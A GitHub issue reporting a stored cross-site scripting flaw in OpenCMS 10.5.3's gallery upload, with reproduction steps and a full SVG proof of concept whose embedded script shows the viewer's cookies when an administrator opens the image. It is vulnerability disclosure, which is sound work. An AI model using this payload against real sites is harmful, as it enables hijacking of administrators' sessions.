Skip to content

Stored Cross Site Scripting via SVG image upload in Gallery Functionality #587

Closed
@MrR3boot

Description

@MrR3boot

Dear Team, i would like to report persistent xss vulnerability in latest release. Mitre.org assigned a CVE ID for this.

Description:

Cross Site Scripting (XSS) Vulnerability in Gallery functionality in OpenCMS 10.5.3 allows remote attackers to execute arbitrary web script via crafted svg image.

Steps to Reproduce:

  1. Login as user who is having Gallery Editor role.
  2. Navigate to gallery and upload below svg file.
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.cookie);
   </script>
</svg>
  1. Once other user who is having Root Administrator permissions visited the image link or viewed the uploaded svg image the script get executed.

Fix:

Input file validation

Affected Version:

10.5.3 latest release

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions